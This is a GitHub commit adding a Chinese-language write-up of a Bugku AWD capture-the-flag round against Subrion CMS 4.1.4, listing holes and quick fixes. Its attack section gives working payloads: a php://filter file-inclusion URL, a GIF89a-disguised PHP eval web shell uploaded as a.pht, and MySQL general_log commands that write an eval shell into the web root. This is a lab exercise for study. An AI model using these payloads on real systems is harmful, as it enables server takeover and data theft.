Skip to content

Commit b9411b4

Browse files
Spark0618Spark0618
authored
Merge pull request #20 from HuajiHD/main
Add: AWD writeup
2 parents 17e44ec + 19cb351 commit b9411b4

File tree

1 file changed

+95
-0
lines changed

1 file changed

+95
-0
lines changed

docs/web/bugku-awd小记-10.7.md

Lines changed: 95 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
# bugku-awd小记10.7
2+
3+
## Web
4+
5+
**Subrion CMS 4.1.4**
6+
7+
先把源码copy下来,拿D盾扫一遍
8+
9+
![image-20251007191012280](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834342.png)
10+
11+
#### 1.文件包含漏洞
12+
13+
fix:直接删除
14+
15+
![image-20251007191047854](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834344.png)
16+
17+
#### 2.弱口令+文件上传
18+
19+
![image-20251007191151830](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834345.png)
20+
21+
管理员后台的账户密码是admin/admin,同时可以从config.inc.php 中得到数据库密码![image-20251007191404310](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834346.png)
22+
23+
fix:改admin弱密码
24+
25+
![image-20251007191520845](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834347.png)
26+
27+
然后登录后台看到可以upload,所以攻击时考虑传马
28+
29+
#### 3.sql注入
30+
31+
在panel里
32+
33+
![image-20251007192515325](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834348.png)
34+
35+
Database处可以进行SQL注入,不过flag是错的
36+
37+
![image-20251007192544890](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834349.png)
38+
39+
这里去群里吹水去了,没来得及修
40+
41+
42+
43+
### attack:
44+
45+
#### 1.文件包含
46+
47+
访问,直接能读到flag
48+
49+
```
50+
http://192-168-1-67.pvp6715.bugku.cn/game/index.php/?file=php://filter/convert.base64-encode/resource=/flag
51+
```
52+
53+
#### 2.传马
54+
55+
**上传点:/panel/uploads**
56+
57+
传a.pht
58+
59+
```
60+
GIF89a
61+
<?php @eval($_REQUEST['huaji']);?>
62+
```
63+
64+
之后访问即可。
65+
66+
![image-20251007192348932](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834350.png)
67+
68+
#### 3.sql注入
69+
70+
panel里的database,先开启general_log
71+
72+
```
73+
set global general_log=on;
74+
```
75+
76+
然后让他写马进去,设置的日志文件路径
77+
78+
```
79+
set global general_log_file="/var/www/html/set_config.php";
80+
select '<?phpeval($_REQUEST[yunsee])?>';
81+
```
82+
83+
这样也可以写马进去
84+
85+
![image-20251007193033553](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834351.png)
86+
87+
## PWN
88+
89+
队友出的,ret2text,签到题
90+
91+
直接读取即可。
92+
93+
![image-20251007193319745](https://cdn.jsdelivr.net/gh/CTF-USTB/Panic404-wp-images/images/20251007200834352.png)
94+
95+
fix的内容没发出来,就不写(抄)了

0 commit comments

Comments
 (0)